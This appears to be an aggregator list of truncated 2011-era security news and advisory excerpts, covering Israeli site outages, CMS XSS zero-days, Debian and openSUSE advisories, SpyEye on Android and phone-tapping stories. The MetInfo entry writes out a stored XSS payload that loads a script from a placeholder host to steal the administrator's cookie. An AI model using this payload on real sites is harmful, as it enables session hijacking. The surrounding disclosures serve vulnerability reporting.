Israeli Military, Intelligence Sites Down After Threat by Anonymous

The Websites of Israel’s Mossad and Shinbet intelligence services as well as the Israel Defense Forces IDF site were knocked offline today following a Nov. 4 threat by Anonymous. However, members of the group may not be to blame. On Nov. 4, members of Anonymous threatened a cyber-attack in...

DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net

Affected versions: DEDECMS full version The vulnerability described in: DEDECMS background landing template gotopage variable is not tested incoming data, leading toXSSvulnerabilities. \dede\templets\login.htm 6 5 the left and right input type="hidden" name="gotopage" value="? php if!...

Debian: Security Advisory (DSA-2311-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation

Trustwave's SpiderLabs Security Advisory TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation https://www.trustwave.com/spiderlabs/advisories/TWSL2011-014.txt Published: 2011-09-23 Version: 1.0 Vendor: Pantech http://www.pantechusa.com Product: Link P7040P, others may be vulnerab...

Variant of SpyEye Targets Android Devices

Researchers at security firm Trusteer claim a new version of the SpyEye Trojan horse program that targets mobile banking users with Android mobile phones and intercepts SMS text messages to and from the phone. However, significant obstacles may prevent it from spreading. Writing on the company’s...

Phone Hacker Forced to Disclose name, Who Told Him to Hack !

Phone Hacker Forced to Disclose name, Who Told Him to Hack ! Court tells private investigator he must identify 'News of the World' executives who asked him to intercept voicemails. A private detective jailed for illegally intercepting voice-mail messages on behalf of a journalist at one of Rupert...

Phone Hacker Forced to Disclose name, Who Told Him to Hack !

Phone Hacker Forced to Disclose name, Who Told Him to Hack ! Court tells private investigator he must identify 'News of the World' executives who asked him to intercept voicemails. A private detective jailed for illegally intercepting voice-mail messages on behalf of a journalist at one of Rupert...

The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net

Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...

Indian Govt wants monitoring access for Twitter, Facebook,Skype and Google

Indian Govt wants monitoring access for Twitter, Facebook,Skype and Google India's authorities are already forcing Research In Motion to grant access to the encrypted email and instant messages of its BlackBerry users, and now the government is pressuring Google and Skype too. Doesn't the...

Yahoo Mail - Cross Site Scripting & Webfilter Bypass

Document Title: =============== Yahoo Mail - Cross Site Scripting & Webfilter Bypass Release Date: ============= 2011-06-29 Vulnerability Laboratory ID VL-ID: ==================================== 130 Product & Service Introduction: =============================== Enjoy tons of features and fun wa...

Sniffjoke 0.4.1 - Anti-sniffing Framework & Tool For Session Scrambling

Sniffjoke 0.4.1 - Anti-sniffing Framework & Tool For Session Scrambling SniffJoke is an application for Linux that handle transparently your TCP connection, delaying, modifying and injecting fake packets inside your transmission, make them almost impossible to be correctly read by a passive...

Vulnerability in Google ClientLogin Protocol !

Vulnerability in Google ClientLogin Protocol ! A group of security and privacy researchers from the Institute of Media Informatics at Ulm University in Germany, is claiming to have discovered a serious security vulnerability in Google's ClientLogin protocol. In a recent analysis of the Android...

openSUSE Security Update : telepathy-gabble (openSUSE-SU-2011:0303-1)

This update of telepathy-gabble is validating the origin of a google:jingleinfo update message now. Not validating the origin could be used to intercept calls. CVE-2011-1000: CVSS v2 Base Score: 6.4 AV:N/AC:L/Au:N/C:P/I:P/A:N: Input Validation CWE-20 %NASLMINLEVEL 70300 C Tenable Network Security...

Apple Releases Security Updates

Apple has released the following security updates: Security Update 2011-002 addresses a vulnerability in the Certificate Trust Policy for Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.7, Mac OS X Sever v10.6.7. Exploitation of this vulnerability may allow an attacker to intercept user...

Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability

The host is installed with Microsoft Windows operating system and is prone to security bypass vulnerability. This NVT has been replaced by NVT secpodms10-015.nasl OID:1.3.6.1.4.1.25623.1.0.900740. OpenVAS Vulnerability Test $Id: gbmswindowsnicsecuritybypassvuln.nasl 5362 2017-02-20 12:46:39Z cfi ...

[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS

DSECRG-11-011 SAP Crystal Reports 2008 - Multiple XSS SAP Crystal Report Server 2008 - multiple cross-site scripting vulnerabilities. SAP Crystal Report Server 2008 - Multiple cross-site scripting vulnerabilities. DSecRG-11-011 Internal DSECRG-00147 Multiple XSS vulnerabilities found in the modul...

Debian Security Advisory DSA 2169-1 (telepathy-gabble)

The remote host is missing an update to telepathy-gabble announced via advisory DSA 2169-1. OpenVAS Vulnerability Test $Id: deb21691.nasl 6613 2017-07-07 12:08:40Z cfischer $ Description: Auto-generated from advisory DSA 2169-1 telepathy-gabble Authors: Thomas Reinke Copyright: Copyright c 2011...

[SECURITY] [DSA 2169-1] telepathy-gabble security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2169-1 [email protected] http://www.debian.org/security/ Nico Golde February 16, 2011 http://www.debian.org/security/faq -...

Six ways your phone can be illegally tapped !

Phone tapping in India has become a national concern with a leading operator revealing that at peak there are upto 100 phone tapping requests a day. In India there are ten major operators, at a conservative average of 50 taps a day per operator, there would be 182,000 authorized phone taps each...

Debian DSA-2169-1 : telepathy-gabble - insufficient input validation

It was discovered that telepathy-gabble, the Jabber/XMPP connection manager for the Telepathy framework, is processing google:jingleinfo updates without validating their origin. This may allow an attacker to trick telepathy-gabble into relaying streamed media data through a server of his choice a...